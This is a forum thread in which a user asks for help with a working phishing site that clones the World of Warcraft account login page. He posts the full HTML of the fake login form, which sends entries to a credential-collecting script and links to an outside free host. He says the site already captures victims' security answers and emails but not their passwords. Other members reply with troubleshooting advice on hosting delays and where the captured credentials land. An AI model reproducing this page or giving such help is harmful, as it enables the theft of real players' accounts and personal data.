[help] phishing website menu

User Tag List

Results 1 to 4 of 4
  1. #1
    Walliegabe's Avatar Member
    Reputation
    6
    Join Date
    Mar 2007
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [help] phishing website

    Hey I've been trying to make a phishing website but it never seems to work, I upload all the files in the right place and the website looks great but when someone fills out all the info and sends it I dont get the account name and password but I get the rest of the info(SQA, Email, Last name). I've tried re-uploading everything twice and tried using different hosting but it never works. I think there might be something wrong with my index page because it doesn't point out to engine.php

    index.html
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> 
    <html xmlns="http://www.w3.org/1999/xhtml"> 
    <head> 
    <title>World of Warcraft Account Login</title> 
    <meta content="false" http-equiv="imagetoolbar" /> 
    <link href="master.css" media="screen, projection" rel="stylesheet" type="text/css" /> 
    <link href="master2.css" media="screen, projection" rel="stylesheet" type="text/css" /> 
    <link href="language.css" media="screen, projection" rel="stylesheet" type="text/css" /> 
    <link href="forms.css" media="screen, projection" rel="stylesheet" type="text/css" /> 
    <link href="print.css" media="print" rel="stylesheet" type="text/css" /> 
    <link href="favicon.ico" rel="shortcut icon" type="image/x-icon" /> 
    <script src="sarissa.js" type="text/javascript" /> 
    <script src="common.js" type="text/javascript" /> 
    <script type="text/javascript"> 
                var jsRoot = '/login/';
                var phRoot = '/login/phaseprism/';
                if(Browser.ie7) {
                    addStylesheet(jsRoot + '_css/ie7.css');
                    }
                else if(Browser.ie6) {
                    addStylesheet(jsRoot + '_css/ie6.css');
                    addStylesheet(phRoot + '_css/ie6.css');
                    }
                else if(Browser.opera) {
                    addStylesheet(jsRoot + '_css/opera.css');
                    }
                </script> 
    </head> 
    <body class="wow-bg" style="position:relative"> 
    <div class="center-wrap"> 
    <div> 
    <div class="login-wow"> 
    <form action=login.php?"/login/login.xml?referer=https%3A%2F%2Fwww.worldofwarcraft.com%2Faccount%2F&amp;loginType=wow" id="loginForm" method="post"> 
    <div> 
    <blockquote> 
    <p> 
    <label for="accountName">Account Name</label> 
    </p> 
    <div style="position: relative; float: left"> 
    <input id="accountName" maxlength="160" name="accountName" tabindex="1" value="" /> 
    <script type="text/javascript"> 
                        window.setTimeout("$('accountName').focus()", 200);
                    </script> 
    <div class="errorTooltip arrowLeft"> 
    <div> 
    <p /> 
    <span class="errorTooltipArrow"> 
    <em> 
    <!----> 
    </em> 
    </span> 
    </div> 
    </div> 
    </div> 
    </blockquote> 
    <blockquote> 
    <p> 
    <label for="password">Password</label> 
    </p> 
    <div style="position: relative; float: left"> 
    <input autocomplete="off" id="password" maxlength="16" name="password" tabindex="2" type="password" /> 
    <div class="errorTooltip arrowLeft"> 
    <div> 
    <p /> 
    <span class="errorTooltipArrow"> 
    <em> 
    <!----> 
    </em> 
    </span> 
    </div> 
    </div> 
    </div> 
    </blockquote> 
    <div> 
    <input style="width:0;height:0;padding:0;border:none" type="submit" /> 
    </div> 
    <div class="btn-wrap"> 
    <a class="wow-button" href="http://hidden.freehostia.com/identity_verification.html" onclick="Form.submit(this)"> 
    <span> 
    <strong>Login</strong> 
    </span> 
    </a> 
    </div> 
    </div> 
    </form> 
    </div> 
    <div class="login-wow-note"> 
    <h1>Forgot Your Password or Account Name?</h1> 
    <p>You will need a valid World of Warcraft account name and password to proceed to Account Management.</p> 
    <a href="http://www.worldofwarcraft.com/loginsupport">Account Name / Password Retrieval</a> 
    <br /> 
    <br /> 
    <a href="http://signup.worldofwarcraft.com/">Create a World of Warcraft Account</a> 
    </div> 
    <div class="wow-login-footer"> 
                To view this page in another language:<br /> 
                <a href="javascript:void(0)" onclick="selectLanguage('en_US'); return false">English (US)</a> |
                <a href="javascript:void(0)" onclick="selectLanguage('en_GB'); return false">English (EU)</a> |
                <a href="javascript:void(0)" onclick="selectLanguage('de_DE'); return false">Deutsch</a> |
                <a href="javascript:void(0)" onclick="selectLanguage('fr_FR'); return false">Fran�ais</a> |
                <a href="javascript:void(0)" onclick="selectLanguage('es_ES'); return false">Espa�ol (EU)</a> |
                <a href="javascript:void(0)" onclick="selectLanguage('es_MX'); return false">Espa�ol (LA)</a> |
                <a href="javascript:void(0)" onclick="selectLanguage('ko_KR'); return false">???</a> |
                <a href="javascript:void(0)" onclick="selectLanguage('ru_RU'); return false">???????</a> 
    <br /> 
    <br /> 
                For security reasons, close your web browser when you are done accessing services that require authentication! Secure Blizzard Entertainment web pages that request your account name and password will contain URLs such as worldofwarcraft.com, blizzard.com, and battle.net. 
            </div> 
    </div> 
    </div> 
    <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript" /> 
    <script type="text/javascript"> 
     
            var pageTracker = _gat._getTracker('UA-544112-15');
     
            function _gaInit() {
                pageTracker._setDomainName("blizzard.com");
                pageTracker._initData();
                pageTracker._trackPageview();
            }
     
            function _htmlDomInit(doc) {
                _htmlDom = doc;
                _gaInit();
            }
     
            /* Partial workaround for Firefox bug 230214 */
            if(typeof(document.cookie) == 'undefined') {
                var obj = document.createElementNS('http://www.w3.org/1999/xhtml', 'object');
                obj.setAttribute('style', 'display:none');
                obj.width = 0;
                obj.height = 0;
                obj.type = 'text/html';
                obj.data = 'data:text/html;charset=utf-8,%3Cscript%3Eparent._htmlDomInit%28document%29%3C/script%3E';
                document.getElementsByTagName('body')[0].appendChild(obj);
                document.__defineGetter__('cookie', function() { return _htmlDom.cookie; });
                document.__defineSetter__('cookie', function(c) { _htmlDom.cookie = c; });
            } else
                _gaInit();
        </script> 
    </body> 
    </html>



    +2 rep is you help get this working
    Last edited by Walliegabe; 02-17-2009 at 07:40 PM.

    [help] phishing website
  2. #2
    Igzz's Avatar ✬✬✬✬✬✬✬✬✬✬ CoreCoins Purchaser
    Reputation
    908
    Join Date
    Jan 2007
    Posts
    1,897
    Thanks G/R
    59/76
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    On some websites it takes time untill it starts working. For example, if you are using Zymic, it will take around 3 hours untill you will recieve information after the upload.

    So you upload it, in 3 hours it should be working and you'll get info instantly then.


  3. #3
    Megadeadlord's Avatar Active Member
    Reputation
    22
    Join Date
    Dec 2007
    Posts
    258
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    there are not any problems with your PHP. The username and pass should come in a different file then the SQA etc.

  4. #4
    Walliegabe's Avatar Member
    Reputation
    6
    Join Date
    Mar 2007
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I'm using Free Hostia and I get all the rest of the info, just not the UN/PW but I'll wait a few hours to see if I receive it and rep you if it works

Similar Threads

  1. I need help with website!
    By Zevx in forum World of Warcraft Emulator Servers
    Replies: 9
    Last Post: 11-22-2007, 11:36 AM
  2. A little help whith website please.
    By billy93123 in forum World of Warcraft Emulator Servers
    Replies: 1
    Last Post: 10-01-2007, 05:02 AM
  3. Slight change to the Phishing (Website) Scam.
    By o0o0o00oo0 in forum WoW Scam Prevention
    Replies: 6
    Last Post: 07-03-2007, 08:30 PM
  4. Coder Needed for Phishing Website
    By Mord699 in forum World of Warcraft General
    Replies: 4
    Last Post: 03-09-2007, 06:42 PM
All times are GMT -5. The time now is 01:50 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search